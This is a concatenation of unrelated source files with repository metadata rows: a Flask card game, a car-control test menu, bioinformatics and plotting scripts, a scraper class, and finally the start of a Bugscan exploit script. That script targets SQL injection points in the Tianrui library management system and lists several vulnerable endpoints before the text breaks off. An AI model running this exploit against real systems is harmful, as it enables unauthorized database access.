@app.route("/", methods=['POST', 'GET'])
def index():
if request.method == "POST":
data = unflatten(request.form.to_dict())
for k,v in data["play"].items():
data["play"][k] = int(v)
game.play(data)
player = {"hand": {k: 0 for k in Card.RANKS},
"coins": game.player.coins,
"points": game.player.total_score}
for k, v in dict(Counter([c.rank for c in game.player.hand])).items():
player["hand"][k] = v
goal = {"set_num": game.current_round[0],
"set_size": game.current_round[1]}
pile = [c.rank for c in game.open_deck.cards]
return render_template('main.html',
player=player,
pile=pile,
goal=goal,
playable = sorted([c for c in game.cards_in_play if c not in ["2", "JOKER"]]),
player_has_drawn=game.player_has_drawn,
game_over = game.game_over,
player_score = game.player.get_current_score(),
ai_score = game.AI.get_current_score(),
ai_total = game.AI.total_score)
@app.route("/info/", methods=['GET'])
def info():
return jsonify({"player": {
"hand": [c.rank for c in game.player.hand],
"played": [c.rank for c in game.player.played_cards],
"coins": game.player.coins,
"score": game.player.get_current_score()
},
"computer": {
"hand": [c.rank for c in game.AI.hand],
"played": [c.rank for c in game.AI.played_cards],
"coins": game.AI.coins,
"score": game.AI.get_current_score()
},
"game": {
"open": [c.rank for c in game.open_deck.cards],
"cards_in_play": list(game.cards_in_play),
"round": game.current_round
}
})
| 38.897059
| 107
| 0.483554
| 292
| 2,645
| 4.236301
| 0.287671
| 0.072757
| 0.038804
| 0.064673
| 0.240097
| 0.240097
| 0.149555
| 0.122878
| 0.045271
| 0
| 0
| 0.003141
| 0.39811
| 2,645
| 67
| 108
| 39.477612
| 0.773869
| 0
| 0
| 0.035714
| 0
| 0
| 0.066718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.107143
| 0.017857
| 0.178571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c921d773c35312ecebe3d4b6eaaaef9e999e9c07
| 4,905
|
py
|
Python
|
bluvo_test.py
|
JanJaapKo/BlUVO
|
2a72b06a56069fee5bd118a12b846513096014b1
|
[
"MIT"
] | null | null | null |
bluvo_test.py
|
JanJaapKo/BlUVO
|
2a72b06a56069fee5bd118a12b846513096014b1
|
[
"MIT"
] | null | null | null |
bluvo_test.py
|
JanJaapKo/BlUVO
|
2a72b06a56069fee5bd118a12b846513096014b1
|
[
"MIT"
] | null | null | null |
import time
import logging
import pickle
import json
import consolemenu
from generic_lib import georeverse, geolookup
from bluvo_main import BlueLink
from tools.stamps import postOffice
from params import * # p_parameters are read
logging.basicConfig(format='%(asctime)s - %(levelname)-8s - %(filename)-18s - %(message)s', filename='bluvo_test.log',
level=logging.DEBUG)
menuoptions = ['0 exit',"1 Lock", "2 Unlock", "3 Status", "4 Status formatted", "5 Status refresh", "6 location", "7 loop status",
"8 Navigate to", '9 set Charge Limits', '10 get charge schedule', '11 get services', '12 poll car', '13 get stamps', '14 odometer', '15 get park location',
'16 get user info', '17 get monthly report', '18 get monthly report lists']
mymenu = consolemenu.SelectionMenu(menuoptions)
# heartbeatinterval, initsuccess = initialise(p_email, p_password, p_pin, p_vin, p_abrp_token, p_abrp_carmodel, p_WeatherApiKey,
# p_WeatherProvider, p_homelocation, p_forcepollinterval, p_charginginterval,
# p_heartbeatinterval)
bluelink = BlueLink(p_email, p_password, p_pin, p_vin, p_abrp_carmodel, p_abrp_token, p_WeatherApiKey, p_WeatherProvider, p_homelocation)
bluelink.initialise(p_forcepollinterval, p_charginginterval)
if bluelink.initSuccess:
#stampie = postOffice("hyundai", False)
while True:
for i in menuoptions:
print(i)
#try:
x = int(input("Please Select:"))
print(x)
if x == 0: exit()
if x == 1: bluelink.vehicle.api_set_lock('on')
if x == 2: bluelink.vehicle.api_set_lock('off')
if x == 3: print(bluelink.vehicle.api_get_status(False))
if x == 4:
status_record = bluelink.vehicle.api_get_status(False, False)
for thing in status_record:
print(thing + ": " + str(status_record[thing]))
if x == 5: print(bluelink.vehicle.api_get_status(True))
if x == 6:
locatie = bluelink.vehicle.api_get_location()
if locatie:
locatie = locatie['gpsDetail']['coord']
print(georeverse(locatie['lat'], locatie['lon']))
if x == 7:
while True:
# read semaphore flag
try:
with open('semaphore.pkl', 'rb') as f:
manualForcePoll = pickle.load(f)
except:
manualForcePoll = False
print(manualForcePoll)
updated, parsedStatus, afstand, googlelocation = bluelink.pollcar(manualForcePoll)
# clear semaphore flag
manualForcePoll = False
with open('semaphore.pkl', 'wb') as f:
pickle.dump(manualForcePoll, f)
if updated:
print('afstand van huis, rijrichting, snelheid en km-stand: ', afstand, ' / ',
parsedStatus['heading'], '/', parsedStatus['speed'], '/', parsedStatus['odometer'])
print(googlelocation)
print("range ", parsedStatus['range'], "soc: ", parsedStatus['chargeHV'])
if parsedStatus['charging']: print("Laden")
if parsedStatus['trunkopen']: print("kofferbak open")
if not (parsedStatus['locked']): print("deuren van slot")
if parsedStatus['dooropenFL']: print("bestuurdersportier open")
print("soc12v ", parsedStatus['charge12V'], "status 12V", parsedStatus['status12V'])
print("=============")
time.sleep(bluelink.heartbeatinterval)
if x == 8: print(bluelink.vehicle.api_set_navigation(geolookup(input("Press Enter address to navigate to..."))))
if x == 9:
invoer = input("Enter maximum for fast and slow charging (space or comma or semicolon or colon seperated)")
for delim in ',;:': invoer = invoer.replace(delim, ' ')
print(bluelink.vehicle.api_set_chargelimits(invoer.split()[0], invoer.split()[1]))
if x == 10: print(json.dumps(bluelink.vehicle.api_get_chargeschedule(),indent=4))
if x == 11: print(bluelink.vehicle.api_get_services())
if x == 12: print(str(bluelink.pollcar(True)))
if x == 13:
print( "feature removed")
if x == 14: print(bluelink.vehicle.api_get_odometer())
if x == 15: print(bluelink.vehicle.api_get_parklocation())
if x == 16: print(bluelink.vehicle.api_get_userinfo())
if x == 17: print(bluelink.vehicle.api_get_monthlyreport(2021,5))
if x == 18: print(bluelink.vehicle.api_get_monthlyreportlist())
input("Press Enter to continue...")
# except (ValueError) as err:
# print("error in menu keuze")
else:
logging.error("initialisation failed")
| 50.56701
| 171
| 0.601019
| 551
| 4,905
| 5.23412
| 0.37931
| 0.019764
| 0.09362
| 0.080097
| 0.173717
| 0.084258
| 0.019417
| 0.019417
| 0.019417
| 0.019417
| 0
| 0.02118
| 0.278084
| 4,905
| 96
| 172
| 51.09375
| 0.793279
| 0.078491
| 0
| 0.050633
| 0
| 0
| 0.188776
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.012658
| 0.113924
| 0
| 0.113924
| 0.341772
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92214401251c6b4745f3ba05c668f2913227e7f
| 2,962
|
py
|
Python
|
lda/test3/interpret_topics.py
|
kaiiam/amazon-continuation
|
9faaba80235614e6eea3e305c423975f2ec72e3e
|
[
"MIT"
] | null | null | null |
lda/test3/interpret_topics.py
|
kaiiam/amazon-continuation
|
9faaba80235614e6eea3e305c423975f2ec72e3e
|
[
"MIT"
] | null | null | null |
lda/test3/interpret_topics.py
|
kaiiam/amazon-continuation
|
9faaba80235614e6eea3e305c423975f2ec72e3e
|
[
"MIT"
] | 1
|
2019-05-28T21:49:45.000Z
|
2019-05-28T21:49:45.000Z
|
#!/usr/bin/env python3
"""
Author : kai
Date : 2019-06-26
Purpose: Rock the Casbah
"""
import argparse
import sys
import re
import csv
# --------------------------------------------------
def get_args():
"""get command-line arguments"""
parser = argparse.ArgumentParser(
description='Argparse Python script',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
# parser.add_argument(
# 'positional', metavar='str', help='A positional argument')
parser.add_argument(
'-a',
'--arg',
help='A named string argument',
metavar='str',
type=str,
default='')
parser.add_argument(
'-i',
'--int',
help='A named integer argument',
metavar='int',
type=int,
default=0)
parser.add_argument(
'-f', '--flag', help='A boolean flag', action='store_true')
return parser.parse_args()
# --------------------------------------------------
def warn(msg):
"""Print a message to STDERR"""
print(msg, file=sys.stderr)
# --------------------------------------------------
def die(msg='Something bad happened'):
"""warn() and exit with error"""
warn(msg)
sys.exit(1)
# --------------------------------------------------
def main():
"""Make a jazz noise here"""
args = get_args()
str_arg = args.arg
int_arg = args.int
flag_arg = args.flag
#pos_arg = args.positional
#read and open the annotations file
intpro_dict = {}
with open('InterPro_entry_list.tsv') as csvfile:
reader = csv.DictReader(csvfile, delimiter='\t')
for row in reader:
intpro_dict[row['ENTRY_AC']] = row['ENTRY_NAME']
with open('model_topics.txt', 'r') as file:
model_topics = file.read().replace('\n', '')
model_topics = re.sub("'", "", model_topics)
model_topics = re.sub("\[", "", model_topics)
model_topics = re.sub("\]", "", model_topics)
mtl = model_topics.split('), ')
with open('output_topics.tsv' ,'w') as f:
print('Topic\tModel_coefficient\tInterpro_ID\tInterPro_ENTRY_NAME', file=f)
for list in mtl:
topic = list[1]
split_list = list.split()
id_re = re.compile('IPR\d{3}')
c_words = []
for w in split_list:
match = id_re.search(w)
if match:
c_words.append(w)
c_words = [re.sub('"', '', i) for i in c_words]
for w in c_words:
re.sub('\)', '', w)
coef, intpro = w.split('*')
intpro = intpro[:9]
if intpro in intpro_dict.keys():
label = intpro_dict[intpro]
else:
label = ''
print('{}\t{}\t{}\t{}'.format(topic,coef,intpro,label), file=f)
# --------------------------------------------------
if __name__ == '__main__':
main()
| 26.684685
| 83
| 0.497637
| 329
| 2,962
| 4.322188
| 0.398176
| 0.06962
| 0.04782
| 0.033755
| 0.07384
| 0.056962
| 0.056962
| 0.056962
| 0.056962
| 0.056962
| 0
| 0.006588
| 0.282579
| 2,962
| 110
| 84
| 26.927273
| 0.662588
| 0.195814
| 0
| 0.043478
| 0
| 0
| 0.13774
| 0.034542
| 0
| 0
| 0
| 0
| 0
| 1
| 0.057971
| false
| 0
| 0.057971
| 0
| 0.130435
| 0.043478
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c924841b1d689ef522dd4926df95b7101d1bb341
| 292
|
py
|
Python
|
app/users/urls.py
|
ManojKumarMRK/recipe-app-api
|
f518e91fc335c46eb1034d865256c94bb3e56b32
|
[
"MIT"
] | null | null | null |
app/users/urls.py
|
ManojKumarMRK/recipe-app-api
|
f518e91fc335c46eb1034d865256c94bb3e56b32
|
[
"MIT"
] | null | null | null |
app/users/urls.py
|
ManojKumarMRK/recipe-app-api
|
f518e91fc335c46eb1034d865256c94bb3e56b32
|
[
"MIT"
] | null | null | null |
from django.urls import path
from users import views
app_name = 'users'
urlpatterns = [
path('create/',views.CreateUserView.as_view(),name='create'),
path('token/',views.CreateTokenView.as_view(),name='token'),
path('me/', views.ManageUserView.as_view(),name='me'),
]
| 26.545455
| 66
| 0.674658
| 37
| 292
| 5.216216
| 0.486486
| 0.093264
| 0.15544
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.14726
| 292
| 11
| 67
| 26.545455
| 0.7751
| 0
| 0
| 0
| 0
| 0
| 0.120141
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92510f03e8c86ab8acb7443fa38d2785d4a3bca
| 4,200
|
py
|
Python
|
archive/visualization/network.py
|
ajrichards/bayesian-examples
|
fbd87c6f1613ea516408e9ebc3c9eff1248246e4
|
[
"BSD-3-Clause"
] | 2
|
2016-01-27T08:51:23.000Z
|
2017-04-17T02:21:34.000Z
|
archive/visualization/network.py
|
ajrichards/notebook
|
fbd87c6f1613ea516408e9ebc3c9eff1248246e4
|
[
"BSD-3-Clause"
] | null | null | null |
archive/visualization/network.py
|
ajrichards/notebook
|
fbd87c6f1613ea516408e9ebc3c9eff1248246e4
|
[
"BSD-3-Clause"
] | null | null | null |
import matplotlib as mpl
import matplotlib.pyplot as plt
import networkx as nx
import pandas as pd
def get_a_dict(filepath):
df = pd.read_csv(filepath).iloc[:, 1:13]
theme_dict = {}
interesting_theme_idx = [3, 6, 11, 15, 16]
theme_names = ['Horrendous IVR', 'Mobile Disengagement', "Couldn't Find it Online", "Mobile Users", "Just Show Me the Summary"]
counter = 0
for row_num in interesting_theme_idx:
theme_dict[theme_names[counter]] = [df.iloc[row_num, ::2], df.iloc[row_num, 1::2]]
counter += 1
return theme_dict
def draw_graph(edgeWeights,plotName='network_graph.png'):
"""
INPUT: this function takes in a dictionary of each edge names and the weight corresponding to that edge name
"""
edgeDict = {"t1e1":("T1","E1"), "t1e2":("T1","E2"), "t1e6":("T1","E6"), "t2e4":("T2","E4"), "t2e5":("T2","E5"), "t2e6":("T2","E6"), "t3e3":("T3","E3"), "t3e4":("T3","E4"), "t3e5":("T3","E5")}
## initialize the graph
G = nx.Graph()
for node in ["T1","T2","T3","E1","E2","E3","E4", "E5", "E6"]:
G.add_node(node)
for edgeName,edge in edgeDict.iteritems():
G.add_edge(edge[0],edge[1],weight=edgeWeights[edgeName])
# explicitly set positions
pos={"T1":(2,2),
"T2":(3.5,2),
"T3":(5,2),
"E1":(1,1),
"E2":(2,1),
"E3":(3,1),
"E4":(4,1),
"E5": (5, 1),
"E6": (6, 1)}
## get insignificant edges
isEdges = [(u,v) for (u,v,d) in G.edges(data=True) if d['weight'] ==0.0]
# plot the network
nodeSize = 2000
colors = [edge[2]['weight'] for edge in G.edges_iter(data=True)]
cmap = plt.cm.winter
fig = plt.figure(figsize=(12,6))
fig.suptitle('Word Theme Probabilities', fontsize=14, fontweight='bold')
ax = fig.add_axes([0.355, 0.0, 0.7, 1.0])
nx.draw(G,pos,node_size=nodeSize,edge_color=colors,width=4,edge_cmap=cmap,edge_vmin=-0.5,edge_vmax=0.5,ax=ax, with_labels=True)
nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["T1","T2","T3"],node_color='#F2F2F2',with_labels=True)
nx.draw_networkx_nodes(G,pos,node_size=nodeSize,nodelist=["E1","E2","E3","E4", "E5", "E6"],node_color='#0066FF',with_labels=True)
nx.draw_networkx_edges(G,pos,edgelist=isEdges,width=1,edge_color='k',style='dashed')
## add a colormap
ax1 = fig.add_axes([0.03, 0.05, 0.35, 0.14])
norm = mpl.colors.Normalize(vmin=0.05, vmax=.2)
cb1 = mpl.colorbar.ColorbarBase(ax1,cmap=cmap,
norm=norm,
orientation='horizontal')
# add an axis for the legend
ax2 = fig.add_axes([0.03,0.25,0.35,0.65]) # l,b,w,h
ax2.set_yticks([])
ax2.set_xticks([])
ax2.set_frame_on(True)
fontSize = 10
ax2.text(0.1,0.9,r"$T1$ = Horrendous IVR" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.8,r"$T2$ = Mobile Disengagement" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.7,r"$T3$ = Mobile Users" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.6,r"$E1$ = agent.transfer->ivr.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.5,r"$E2$ = agent.assigned->call.transfer" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.4,r"$E3$ = sureswip.login->view.account.summary" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.3,r"$E4$ = mobile.exit->mobile.entry" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.2,r"$E5$ = mobile.exit->journey.exit" ,color='k',fontsize=fontSize,ha="left", va="center")
ax2.text(0.1,0.1,r"$E6$ = ivr.entry->ivr.proactive.balance" ,color='k',fontsize=fontSize,ha="left", va="center")
plt.savefig(plotName)
if __name__ == "__main__":
filepath = '../word_transition_model/data/transitions_df.csv'
data_dict = get_a_dict(filepath)
summary = data_dict['Just Show Me the Summary']
summary_events = summary[0]
summary_scores = summary[1]
edge_weights = {"t1e1":0.14, "t1e2":0.13, "t1e6":0.12, "t2e4":0.05, "t2e5":0.16, "t2e6":0.0, "t3e3":0.3, "t3e4":0.1, "t3e5":0.04}
draw_graph(edge_weights)
| 44.680851
| 196
| 0.61381
| 680
| 4,200
| 3.694118
| 0.305882
| 0.008758
| 0.028662
| 0.032245
| 0.272293
| 0.244427
| 0.21258
| 0.21258
| 0.198248
| 0.198248
| 0
| 0.077967
| 0.175476
| 4,200
| 93
| 197
| 45.16129
| 0.647416
| 0.058571
| 0
| 0
| 0
| 0
| 0.204123
| 0.055739
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028986
| false
| 0
| 0.057971
| 0
| 0.101449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92dbb28d5fa5849ee22ef3b509bd866ce701e9e
| 1,508
|
py
|
Python
|
scripts/previousScripts-2015-12-25/getVariableInfo.py
|
mistryrakesh/SMTApproxMC
|
7c97e10c46c66e52c4e8972259610953c3357695
|
[
"MIT"
] | null | null | null |
scripts/previousScripts-2015-12-25/getVariableInfo.py
|
mistryrakesh/SMTApproxMC
|
7c97e10c46c66e52c4e8972259610953c3357695
|
[
"MIT"
] | null | null | null |
scripts/previousScripts-2015-12-25/getVariableInfo.py
|
mistryrakesh/SMTApproxMC
|
7c97e10c46c66e52c4e8972259610953c3357695
|
[
"MIT"
] | null | null | null |
#!/home/rakeshmistry/bin/Python-3.4.3/bin/python3
# @author: rakesh mistry - 'inspire'
# @date: 2015-08-06
import sys
import re
import os
import math
# Function: parseSmt2File
def parseSmt2FileVariables(smt2File):
compiledVarPattern = re.compile("[ \t]*\(declare-fun")
varMap = {}
for line in smt2File:
if compiledVarPattern.search(line):
wordList = line.split()
varName = wordList[1]
varWidthStr = wordList[-1].rstrip(")")
if varWidthStr.isdigit():
varWidth = int(varWidthStr)
varMap[varName] = varWidth
return varMap
# Function: main
def main(argv):
# check for correct number of arguments
scriptName = os.path.basename(__file__)
if len(argv) < 3:
sys.stderr.write("Error: Invalid arguments.\n")
sys.stderr.write(" [Usage]: " + scriptName + " <input_SMT2_file> <output_file>\n")
sys.exit(1)
# open files
inputSMTFile = open(argv[1], "r")
finalOutputFile = open(argv[2], "w")
varMap = parseSmt2FileVariables(inputSMTFile)
maxBitwidth = max(varMap.values())
singleBitVars = 0
multiBitVars = 0
for key in varMap.keys():
if varMap[key] > 1:
multiBitVars += 1
else:
singleBitVars += 1
finalOutputFile.write(str(maxBitwidth) + ";" + str(len(varMap)) + ";" + str(multiBitVars) + ";" + str(singleBitVars))
finalOutputFile.close()
if __name__ == "__main__":
main(sys.argv)
| 25.133333
| 121
| 0.611406
| 163
| 1,508
| 5.564417
| 0.533742
| 0.019846
| 0.030871
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025847
| 0.255968
| 1,508
| 59
| 122
| 25.559322
| 0.782531
| 0.125332
| 0
| 0
| 0
| 0
| 0.081555
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054054
| false
| 0
| 0.108108
| 0
| 0.189189
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92faeda80f7623d46a23810d5c128754efcada2
| 9,880
|
py
|
Python
|
simplified_scrapy/core/spider.py
|
yiyedata/simplified-scrapy
|
ccfdc686c53b2da3dac733892d4f184f6293f002
|
[
"Apache-2.0"
] | 7
|
2019-08-11T10:31:03.000Z
|
2021-03-08T10:07:52.000Z
|
simplified_scrapy/core/spider.py
|
yiyedata/simplified-scrapy
|
ccfdc686c53b2da3dac733892d4f184f6293f002
|
[
"Apache-2.0"
] | 1
|
2020-12-29T02:30:18.000Z
|
2021-01-25T02:49:37.000Z
|
simplified_scrapy/core/spider.py
|
yiyedata/simplified-scrapy
|
ccfdc686c53b2da3dac733892d4f184f6293f002
|
[
"Apache-2.0"
] | 4
|
2019-10-22T02:14:35.000Z
|
2021-05-13T07:01:56.000Z
|
#!/usr/bin/python
#coding=utf-8
import json, re, logging, time, io, os
import sys
from simplified_scrapy.core.config_helper import Configs
from simplified_scrapy.core.sqlite_cookiestore import SqliteCookieStore
from simplified_scrapy.core.request_helper import requestPost, requestGet, getResponseStr, extractHtml
from simplified_scrapy.core.utils import convertTime2Str, convertStr2Time, printInfo, absoluteUrl
from simplified_scrapy.core.regex_helper import *
from simplified_scrapy.core.sqlite_urlstore import SqliteUrlStore
from simplified_scrapy.core.sqlite_htmlstore import SqliteHtmlStore
from simplified_scrapy.core.obj_store import ObjStore
class Spider():
name = None
models = None
concurrencyPer1s = 1
use_cookie = True
use_ip = False # globle
version = "0.0.1"
request_timeout = None
allowed_domains = []
excepted_domains = []
custom_down = False # globle
useragent = None
proxyips = None
logged_in = False
login_data = None
refresh_urls = False
stop = False
encodings = {}
request_tm = False
save_html = True
def __init__(self, name=None):
try:
if name is not None:
self.name = name
elif not getattr(self, 'name', None):
raise ValueError("%s must have a name" % type(self).__name__)
if not hasattr(self, 'start_urls'):
self.start_urls = []
if not hasattr(self, 'url_store'):
self.url_store = SqliteUrlStore(self.name)
if not hasattr(self, 'html_store'):
self.html_store = SqliteHtmlStore(self.name)
if not hasattr(self, "obj_store"):
self.obj_store = ObjStore(self.name)
if not hasattr(self, "cookie_store"):
self.cookie_store = SqliteCookieStore()
if not self.refresh_urls:
self.url_store.saveUrl(self.start_urls, 0)
else:
self.url_store.resetUrls(self.start_urls)
self.listA = listA
self.listImg = listImg
self.getElementsByTag = getElementsByTag
self.getElementByID = getElementByID
self.getElementsByClass = getElementsByClass
self.getElementByTag = getElementByTag
self.getElementByClass = getElementByClass
self.getElement = getElement
self.getElements = getElements
self.getElementByAttr = getElementByAttr
self.getParent = getParent
self.getChildren = getChildren
self.getNexts = getNexts
self.getSection = getSection
self.removeHtml = removeHtml
self.trimHtml = trimHtml
self.removeScripts = removeScripts
self.tm = 0
self.absoluteUrl = absoluteUrl
except Exception as err:
self.log(err, logging.ERROR)
def log(self, msg, level=logging.DEBUG):
printInfo(msg)
logger = logging.getLogger()
logging.LoggerAdapter(logger, None).log(level, msg)
def login(self, obj=None):
if (not obj): obj = self.login_data
if (obj and obj.get('url')):
data = obj.get('data')
if (obj.get('method') == 'get'):
return requestGet(obj.get('url'), obj.get('headers'),
obj.get('useProxy'), self)
else:
return requestPost(obj.get('url'), data, obj.get('headers'),
obj.get('useProxy'), self)
else:
return False
def getCookie(self, url):
if (self.use_cookie and self.cookie_store):
return self.cookie_store.getCookie(url)
return None
def setCookie(self, url, cookie):
if (self.use_cookie and self.cookie_store and cookie):
self.cookie_store.setCookie(url, cookie)
def beforeRequest(self, url, request, extra=None):
cookie = self.getCookie(url)
if (cookie):
if sys.version_info.major == 2:
request.add_header('Cookie', cookie)
else:
request.add_header('Cookie', cookie)
return request
def afterResponse(self, response, url, error=False, extra=None):
html = getResponseStr(response, url, self, error)
if sys.version_info.major == 2:
cookie = response.info().getheaders('Set-Cookie')
else:
cookie = response.info().get('Set-Cookie')
self.setCookie(url, cookie)
return html
def renderUrl(self, url, callback):
printInfo('Need to implement method "renderUrl"')
def customDown(self, url):
printInfo('Need to implement method "customDown"')
def popHtml(self, state=0):
return self.html_store.popHtml(state)
def saveHtml(self, url, html):
if (html):
if self.save_html:
self.html_store.saveHtml(url, html)
else:
return self.extract(Dict(url), html, None, None)
def updateHtmlState(self, id, state):
self.html_store.updateState(id, state)
def downloadError(self, url, err=None):
printInfo('error url:', url, err)
self.url_store.updateState(url, 2)
def isPageUrl(self, url):
if (not url):
return False
if ("html.htm.jsp.asp.php".find(url[-4:].lower()) >= 0):
return True
if ('.jpg.png.gif.bmp.rar.zip.pdf.doc.xls.ppt.exe.avi.mp4'.find(
url[-4:].lower()) >= 0
or '.jpeg.xlsx.pptx.docx'.find(url[-5:].lower()) >= 0
or '.rm'.find(url[-3:].lower()) >= 0):
return False
return True
def urlFilter(self, url):
if (self.excepted_domains):
for d in self.excepted_domains:
if (url.find(d) > -1): return False
if (self.allowed_domains):
for d in self.allowed_domains:
if (url.find(d) > -1): return True
return False
return True
def _urlFilter(self, urls):
tmp = []
for url in urls:
u = url['url']
if u and self.urlFilter(u):
tmp.append(url)
return tmp
def saveData(self, data):
if (data):
if (not isinstance(data, list) and not isinstance(data, dict)):
objs = json.loads(data)
elif isinstance(data, dict):
objs = [data]
else:
objs = data
for obj in objs:
if (obj.get("Urls")):
self.saveUrl(obj.get("Urls"))
ds = obj.get("Data")
if (ds):
if isinstance(ds, list):
for d in ds:
self.saveObj(d)
else:
self.saveObj(ds)
def saveObj(self, data):
self.obj_store.saveObj(data)
def extract(self, url, html, models, modelNames):
if (not modelNames):
return False
else:
return extractHtml(url["url"], html, models, modelNames,
url.get("title"))
_downloadPageNum = 0
_startCountTs = time.time()
def checkConcurrency(self):
tmSpan = time.time() - self._startCountTs
if (self._downloadPageNum > (self.concurrencyPer1s * tmSpan)):
return False
self._startCountTs = time.time()
self._downloadPageNum = 0
return True
def popUrl(self):
if (self.checkConcurrency()):
url = self.url_store.popUrl()
if url: self._downloadPageNum = self._downloadPageNum + 1
return url
else:
return {}
return None
def urlCount(self):
return self.url_store.getCount()
def saveUrl(self, urls):
if not urls: return
if not isinstance(urls, list): urls = [urls]
u = urls[0]
if isinstance(u, str):
if u.startswith('http'):
urls = [{'url': url} for url in urls]
else:
logging.warn('Bad link data')
return
elif not u.get('url'):
if u.get('href'):
for url in urls:
url['url'] = url.get('href')
elif u.get('src'):
for url in urls:
url['url'] = url.get('src')
else:
logging.warn('Link data has no url attribute')
return
urls = self._urlFilter(urls)
self.url_store.saveUrl(urls)
def plan(self):
return []
def clearUrl(self):
self.url_store.clearUrl()
def resetUrlsTest(self):
self.url_store.resetUrls(self.start_urls)
def resetUrls(self, plan):
if (plan and len(plan) > 0):
for p in plan:
now = time.localtime()
hour = now[3]
minute = now[4]
if (p.get('hour')):
hour = p.get('hour')
if (p.get('minute')):
minute = p.get('minute')
planTime = time.strptime(
u"{}-{}-{} {}:{}:00".format(now[0], now[1], now[2], hour,
minute), "%Y-%m-%d %H:%M:%S")
configKey = u"plan_{}".format(self.name)
_lastResetTime = Configs().getValue(configKey)
if (now > planTime
and (not _lastResetTime
or float(_lastResetTime) < time.mktime(planTime))):
self.url_store.resetUrls(self.start_urls)
Configs().setValue(configKey, float(time.mktime(planTime)))
return True
return False
| 34.666667
| 102
| 0.542611
| 1,075
| 9,880
| 4.901395
| 0.227907
| 0.027899
| 0.025052
| 0.03644
| 0.171949
| 0.112355
| 0.079712
| 0.037199
| 0.015563
| 0
| 0
| 0.00593
| 0.351417
| 9,880
| 284
| 103
| 34.788732
| 0.816323
| 0.004251
| 0
| 0.160643
| 0
| 0.004016
| 0.050539
| 0.005288
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108434
| false
| 0
| 0.040161
| 0.012048
| 0.353414
| 0.02008
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
c92fe0a2d25d872fa12d88c6134dd6759ab24310
| 1,457
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-2469.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/evn python
#--coding:utf-8--*--
#Name:天睿电子图书管理系统系统10处注入打包 避免重复
#Refer:http://www.wooyun.org/bugs/wooyun-2015-0120852/
#Author:xq17
def assign(service,arg):
if service=="tianrui_lib":
return True,arg
def audit(arg):
urls = [
arg + 'gl_tj_0.asp?id=1',
arg + 'gl_tuijian_1.asp',
arg + 'gl_tz_she.asp?zt=1&id=1',
arg + 'gl_us_shan.asp?id=1',
